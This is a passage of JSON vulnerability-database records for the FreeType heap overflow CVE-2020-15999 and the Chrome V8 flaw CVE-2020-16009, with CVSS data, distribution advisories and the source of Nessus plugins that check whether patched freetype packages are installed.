3.6}, "published": "2020-11-03T03:15:00", "type": "cve", "title": "CVE-2020-15999", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2022-01-28T17:40:00", "cpe": ["cpe:/a:opensuse:backports_sle:15.0", "cpe:/o:fedoraproject:fedora:31", "cpe:/o:debian:debian_linux:10.0"], "id": "CVE-2020-15999", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-15999", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:opensuse:backports_sle:15.0:sp2:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2023-02-03T13:43:27", "description": "Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.183\nallowed a remote attacker to potentially exploit heap corruption via a\ncrafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-03T00:00:00", "type": "ubuntucve", "title": "CVE-2020-16009", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16009"], "modified": "2020-11-03T00:00:00", "id": "UB:CVE-2020-16009", "href": "https://ubuntu.com/security/CVE-2020-16009", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-27T13:39:25", "description": "Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111\nallowed a remote attacker to potentially exploit heap corruption via a\ncrafted HTML page.\n\n#### Bugs\n\n * <https://savannah.nongnu.org/bugs/?59308>\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-10-20T00:00:00", "type": "ubuntucve", "title": "CVE-2020-15999", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2020-10-20T00:00:00", "id": "UB:CVE-2020-15999", "href": "https://ubuntu.com/security/CVE-2020-15999", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2022-12-21T14:41:40", "description": "The remote Oracle Linux 8 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2020-4952 advisory.\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-11-14T00:00:00", "type": "nessus", "title": "Oracle Linux 8 : freetype (ELSA-2020-4952)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:oracle:linux:8", "p-cpe:/a:oracle:linux:freetype", "p-cpe:/a:oracle:linux:freetype-devel"], "id": "ORACLELINUX_ELSA-2020-4952.NASL", "href": "https://www.tenable.com/plugins/nessus/142895", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2020-4952.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142895);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Oracle Linux 8 : freetype (ELSA-2020-4952)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2020-4952 advisory.\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2020-4952.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype and / or freetype-devel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15999\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:freetype-devel\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 8', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\npkgs = [\n {'reference':'freetype-2.9.1-4.el8_3.1', 'cpu':'aarch64', 'release':'8'},\n {'reference':'freetype-2.9.1-4.el8_3.1', 'cpu':'i686', 'release':'8'},\n {'reference':'freetype-2.9.1-4.el8_3.1', 'cpu':'x86_64', 'release':'8'},\n {'reference':'freetype-devel-2.9.1-4.el8_3.1', 'cpu':'aarch64', 'release':'8'},\n {'reference':'freetype-devel-2.9.1-4.el8_3.1', 'cpu':'i686', 'release':'8'},\n {'reference':'freetype-devel-2.9.1-4.el8_3.1', 'cpu':'x86_64', 'release':'8'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n rpm_prefix = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['rpm_prefix'])) rpm_prefix = package_array['rpm_prefix'];\n if (reference && release) {\n if (rpm_prefix) {\n if (rpm_exists(release:release, rpm:rpm_prefix) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'freetype / freetype-devel');\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:40:16", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:4949 advisory.\n\n - freetype: Heap-based buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-11-05T00:00:00", "type": "nessus", "title": "RHEL 8 : freetype (RHSA-2020:4949)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:redhat:rhel_e4s:8.0", "p-cpe:/a:redhat:enterprise_linux:freetype", "p-cpe:/a:redhat:enterprise_linux:freetype-devel"], "id": "REDHAT-RHSA-2020-4949.NASL", "href": "https://www.tenable.com/plugins/nessus/142469", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:4949. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142469);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"RHSA\", value:\"2020:4949\");\n script_xref(name:\"IAVA\", value:\"2020-A-0486-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"RHEL 8 : freetype (RHSA-2020:4949)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:4949 advisory.\n\n - freetype: Heap-based buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/122.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/190.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-15999\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4949\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1890210\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype and / or freetype-devel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15999\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(122, 190);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freetype-devel\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nvar os_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar repositories = {\n 'rhel_e4s_8_0_appstream': [\n 'rhel-8-for-x86_64-appstream-e4s-debug-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-debug-rpms__8_DOT_0',\n 'rhel-8-for-x86_64-appstream-e4s-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-rpms__8_DOT_0',\n 'rhel-8-for-x86_64-appstream-e4s-source-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-source-rpms__8_DOT_0'\n ],\n 'rhel_e4s_8_0_baseos': [\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms__8_DOT_0',\n 'rhel-8-for-x86_64-baseos-e4s-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-rpms__8_DOT_0',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms__8_DOT_0'\n ],\n 'rhel_e4s_8_0_highavailability': [\n 'rhel-8-for-x86_64-highavailability-e4s-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-debug-rpms__8_DOT_0',\n 'rhel-8-for-x86_64-highavailability-e4s-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-rpms__8_DOT_0',\n 'rhel-8-for-x86_64-highavailability-e4s-source-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-source-rpms__8_DOT_0'\n ],\n 'rhel_e4s_8_0_sap': [\n 'rhel-8-for-x86_64-sap-netweaver-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-debug-rpms__8_DOT_0',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-rpms__8_DOT_0',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-source-rpms__8_DOT_0'\n ],\n 'rhel_e4s_8_0_sap_hana': [\n 'rhel-8-for-x86_64-sap-solutions-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-debug-rpms__8_DOT_0',\n 'rhel-8-for-x86_64-sap-solutions-e4s-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-rpms__8_DOT_0'\n ]\n};\n\nvar repo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\nvar pkgs = [\n {'reference':'freetype-2.9.1-4.el8_0.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_0_appstream', 'rhel_e4s_8_0_baseos', 'rhel_e4s_8_0_highavailability', 'rhel_e4s_8_0_sap', 'rhel_e4s_8_0_sap_hana']},\n {'reference':'freetype-2.9.1-4.el8_0.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_0_appstream', 'rhel_e4s_8_0_baseos', 'rhel_e4s_8_0_highavailability', 'rhel_e4s_8_0_sap', 'rhel_e4s_8_0_sap_hana']},\n {'reference':'freetype-devel-2.9.1-4.el8_0.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_0_appstream', 'rhel_e4s_8_0_baseos', 'rhel_e4s_8_0_highavailability', 'rhel_e4s_8_0_sap', 'rhel_e4s_8_0_sap_hana']},\n {'reference':'freetype-devel-2.9.1-4.el8_0.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_0_appstream', 'rhel_e4s_8_0_baseos', 'rhel_e4s_8_0_highavailability', 'rhel_e4s_8_0_sap', 'rhel_e4s_8_0_sap_hana']}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n var repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference &&\n release &&\n (rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets) || (!exists_check || rpm_exists(release:release, rpm:exists_check))) &&\n rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n}\n\nif (flag)\n{\n var subscription_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in the Red Hat Enterprise Linux\\n' +\n 'Update Services for SAP Solutions repository.\\n' +\n 'Access to this repository requires a paid RHEL subscription.\\n';\n var extra = NULL;\n if (empty_or_null(repo_sets)) extra = subscription_caveat + rpm_report_get() + redhat_report_repo_caveat();\n else extra = subscription_caveat + rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'freetype / freetype-devel');\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:43:59", "description": "This update for freetype2 fixes the following issues :\n\nCVE-2020-15999: fixed a heap buffer overflow found in the handling of embedded PNG bitmaps (bsc#1177914).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : freetype2 (SUSE-SU-2020:2995-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:freetype2-debugsource", "p-cpe:/a:novell:suse_linux:freetype2-devel", "p-cpe:/a:novell:suse_linux:ftdump", "p-cpe:/a:novell:suse_linux:libfreetype6", "p-cpe:/a:novell:suse_linux:libfreetype6-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libfreetype6-debuginfo", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-2995-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143803", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2995-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143803);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : freetype2 (SUSE-SU-2020:2995-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for freetype2 fixes the following issues :\n\nCVE-2020-15999: fixed a heap buffer overflow found in the handling of\nembedded PNG bitmaps (bsc#1177914).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1177914\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-15999/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202995-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?778f52ba\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 15 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2020-2995=1\n\nSUSE Linux Enterprise Server 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-2020-2995=1\n\nSUSE Linux Enterprise Module for Desktop Applications 15-SP2 :\n\nzypper in -t patch\nSUSE-SLE-Module-Desktop-Applications-15-SP2-2020-2995=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2020-2995=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP1-2020-2995=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-2995=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-2995=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:freetype2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:freetype2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ftdump\");\n 